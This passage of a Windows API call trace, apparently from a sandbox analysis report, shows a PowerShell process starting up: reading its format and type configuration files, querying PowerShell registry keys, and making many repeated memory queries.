	[0099.586] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.586] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.586] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.586] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.587] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.587] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0099.587] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x1b4, lpOverlapped=0x0) returned 1
	[0099.587] ReadFile (in: hFile=0x334, lpBuffer=0x2c555d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed4e8, lpOverlapped=0x0 | out: lpBuffer=0x2c555d8*, lpNumberOfBytesRead=0xed4e8*=0x0, lpOverlapped=0x0) returned 1
	[0099.588] CloseHandle (hObject=0x334) returned 1
	[0099.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0099.588] SetErrorMode (uMode=0x1) returned 0x1
	[0099.588] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed460 | out: lpFileInformation=0xed460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0099.588] SetErrorMode (uMode=0x1) returned 0x1
	[0099.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xed190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0099.588] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed548 | out: phkResult=0xed548*=0x334) returned 0x0
	[0099.588] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed4cc, lpData=0x0, lpcbData=0xed4c8*=0x0 | out: lpType=0xed4cc*=0x1, lpData=0x0, lpcbData=0xed4c8*=0x56) returned 0x0
	[0099.588] CoTaskMemAlloc (cb=0x5a) returned 0x1f49f0
	[0099.588] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed49c, lpData=0x1f49f0, lpcbData=0xed498*=0x56 | out: lpType=0xed49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed498*=0x56) returned 0x0
	[0099.589] CoTaskMemFree (pv=0x1f49f0) 
	[0099.589] RegCloseKey (hKey=0x334) returned 0x0
	[0099.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xed190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0099.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xed040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0099.921] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0099.932] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0099.933] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0099.934] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0099.934] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0099.934] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.010] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.012] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.038] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.039] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.039] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.039] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.039] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.040] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.040] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.040] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.049] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.056] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.056] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.056] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.057] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.057] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.058] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.058] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.059] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.079] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.080] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.080] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.080] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.081] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.084] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.088] VirtualQuery (in: lpAddress=0xec240, lpBuffer=0xed100, dwLength=0x30 | out: lpBuffer=0xed100*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.088] VirtualQuery (in: lpAddress=0xec240, lpBuffer=0xed100, dwLength=0x30 | out: lpBuffer=0xed100*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.088] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.090] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.117] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.117] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.117] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.219] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0100.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0100.219] CoTaskMemFree (pv=0x28e180) 
	[0100.221] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.226] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.226] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.227] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.227] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.227] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.227] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.229] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.230] VirtualQuery (in: lpAddress=0xec230, lpBuffer=0xed0f0, dwLength=0x30 | out: lpBuffer=0xed0f0*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.231] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xed6e8 | out: phkResult=0xed6e8*=0x334) returned 0x0
	[0100.231] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0xed6fc, lpData=0x0, lpcbData=0xed6f8*=0x0 | out: lpType=0xed6fc*=0x1, lpData=0x0, lpcbData=0xed6f8*=0x74) returned 0x0
	[0100.231] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0xed66c, lpData=0x0, lpcbData=0xed668*=0x0 | out: lpType=0xed66c*=0x1, lpData=0x0, lpcbData=0xed668*=0x74) returned 0x0
	[0100.231] CoTaskMemAlloc (cb=0x78) returned 0x21c430
	[0100.232] RegQueryValueExW (in: hKey=0x334, lpValueName="path", lpReserved=0x0, lpType=0xed63c, lpData=0x21c430, lpcbData=0xed638*=0x74 | out: lpType=0xed63c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xed638*=0x74) returned 0x0
	[0100.232] CoTaskMemFree (pv=0x21c430) 
	[0100.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xed3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0100.232] SetErrorMode (uMode=0x1) returned 0x1
	[0100.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xed5c0 | out: lpFileInformation=0xed5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0100.232] SetErrorMode (uMode=0x1) returned 0x1
	[0100.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xed3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.233] SetErrorMode (uMode=0x1) returned 0x1
	[0100.233] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed5c0 | out: lpFileInformation=0xed5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0100.233] SetErrorMode (uMode=0x1) returned 0x1
	[0100.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0100.234] SetErrorMode (uMode=0x1) returned 0x1
	[0100.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed5c0 | out: lpFileInformation=0xed5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0100.234] SetErrorMode (uMode=0x1) returned 0x1
	[0100.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.234] SetErrorMode (uMode=0x1) returned 0x1
	[0100.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed5c0 | out: lpFileInformation=0xed5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0100.234] SetErrorMode (uMode=0x1) returned 0x1
	[0100.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.234] SetErrorMode (uMode=0x1) returned 0x1
	[0100.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed5c0 | out: lpFileInformation=0xed5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0100.235] SetErrorMode (uMode=0x1) returned 0x1
	[0100.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xed3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0100.235] SetErrorMode (uMode=0x1) returned 0x1
